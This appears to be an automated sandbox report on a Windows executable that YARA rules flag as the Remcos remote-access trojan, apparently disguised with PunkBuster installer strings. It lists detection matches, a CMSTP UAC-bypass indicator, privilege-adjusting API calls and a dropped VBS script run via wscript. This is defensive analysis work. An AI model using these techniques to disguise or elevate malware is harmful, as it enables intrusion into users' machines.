Source: Yara match | File source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000DBB77 SystemParametersInfoW

              System Summary

              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants, Author: unknown
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Author: ditekSHen
              Source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965, Author: unknown
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | File dump: PerfectouinVans.exe.0.dr 979567347
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Process Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000D58B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_004BF370
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_004C4DBB
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000DD071
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000FD098
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_001120D2
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F7150
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F61AA
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000E6254
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F1377
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F651C
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000DE5DF
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_0010C739
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000E67CB
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F67C6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000FC9DD
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F2A49
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F6A8D
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000FCC0C
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F4D22
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F6D48
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_00100E20
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000FCE3B
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000E6E73
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_00112F00
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000D2F45
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000E6FAD
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_004BF370
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_004C4DBB
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: String function: 000C1F66 appears 49 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: String function: 004010F0 appears 34 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: String function: 000F38A5 appears 41 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: String function: 000F3FB0 appears 55 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: String function: 004BC0F4 appears 126 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: String function: 000C20E7 appears 41 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: String function: 004BD2C8 appears 82 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: String function: 00401072 appears 114 times
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: String function: 0048CFD0 appears 50 times
              Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001B55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe.mui` vs 4wECQoBvYC.exe
              Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001B55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamewscript.exe` vs 4wECQoBvYC.exe
              Source: 4wECQoBvYC.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@5/4@2/2
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_00401896 __EH_prolog,GetLastError,FormatMessageA,LocalFree
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_004090DF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000D6AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_004090DF GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000CE219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_0040631D __EH_prolog,CoCreateInstance
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000DA63F FindResourceA,LoadResource,LockResource,SizeofResource
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000D9BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | File created: C:\Users\user\Documents\Perfectouin
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Mutant created: \Sessions\1\BaseNamedObjects\kkdhhcnbvyrmqyodgffgfdds-SO2AWR
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | File created: C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs"
              Source: 4wECQoBvYC.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 4wECQoBvYC.exe | ReversingLabs: Detection: 28%
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: You must specify install or un-install when using the no-display command-line switch.
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: You must specify install or un-install when using the no-prompts command-line switch.
              Source: 4wECQoBvYC.exe | String found in binary or memory: Un-Install PunkBuster Service
              Source: 4wECQoBvYC.exe | String found in binary or memory: Are you sure you want to un-install the PunkBuster Service?
              Source: 4wECQoBvYC.exe | String found in binary or memory: Un-installing
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: Could not read PnkBstrB port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: Could not read PnkBstrA port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: The version of PnkBstrA installed on your system is outdated. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exe | String found in binary or memory: This program will help you install or un-install the PunkBuster Anti-cheat service. Please make your selection and then click "Next" to continue.
              Source: 4wECQoBvYC.exe | String found in binary or memory: Install/Re-Install PunkBuster Service
              Source: 4wECQoBvYC.exe | String found in binary or memory: Un-Install/Remove PunkBuster Service
              Source: 4wECQoBvYC.exe | String found in binary or memory: This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue.
              Source: 4wECQoBvYC.exe | String found in binary or memory: Un-Install PunkBuster Service
              Source: 4wECQoBvYC.exe | String found in binary or memory: Are you sure you want to un-install the PunkBuster Service?
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: You must specify install or un-install when using the no-display command-line switch.
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: You must specify install or un-install when using the no-prompts command-line switch.
              Source: 4wECQoBvYC.exe | String found in binary or memory: Un-installing
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: Could not read PnkBstrB port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: Could not read PnkBstrA port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: The version of PnkBstrA installed on your system is outdated. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exe | String found in binary or memory: This program will help you install or un-install the PunkBuster Anti-cheat service. Please make your selection and then click "Next" to continue.
              Source: 4wECQoBvYC.exe | String found in binary or memory: Install/Re-Install PunkBuster Service
              Source: 4wECQoBvYC.exe | String found in binary or memory: Un-Install/Remove PunkBuster Service
              Source: 4wECQoBvYC.exe | String found in binary or memory: This program will help you install or un-install the PunkBuster Anti-cheat service.Please make your selection and then click "Next" to continue.
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: Could not read PnkBstrB port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: Could not read PnkBstrA port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
